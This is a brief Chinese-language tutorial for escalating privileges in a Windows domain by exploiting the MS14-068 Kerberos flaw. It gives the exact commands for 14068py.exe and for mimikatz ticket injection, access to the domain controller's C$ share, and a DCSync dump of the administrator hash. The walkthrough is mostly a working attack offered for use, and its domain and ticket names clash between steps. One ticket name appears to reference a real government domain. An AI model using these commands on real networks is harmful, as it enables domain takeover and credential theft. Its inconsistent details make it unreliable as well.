总步骤:
将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号,再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache,然后输入klist purge清除所有的票据,然后输入mimikatz.exe “kerberos::ptc TGT_jperesam@sctusr.sctdom.gob.mx.ccache” exit获取票据,然后就可以dir \dc\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域hash值。
一.将mimikatz和14068漏洞放到客户机上,打开cmd输入whoami /all查看SID号。
二.再输入14068py.exe -u test@hack.com -p “123.com” -s SID号 -d dc1.contoso.com获取TGT_kim@contoso.com.ccache
三.然后输入klist purge清除所有的票据
四.再输入mimikatz.exe “kerberos::ptc 你刚刚获取的票据名字” exit获取票据
五. 然后就可以dir \域管计算机名\c$连接上dc,达到提权目的,在输入mimikatz.exe,输入lsadump::dcsync /domain:hack.com /user:administrator /csv获取域管hash值,或者可以更改administrator获取其他用户的hash值。
配合“内网渗透的域控制命令”链接使用更方便哦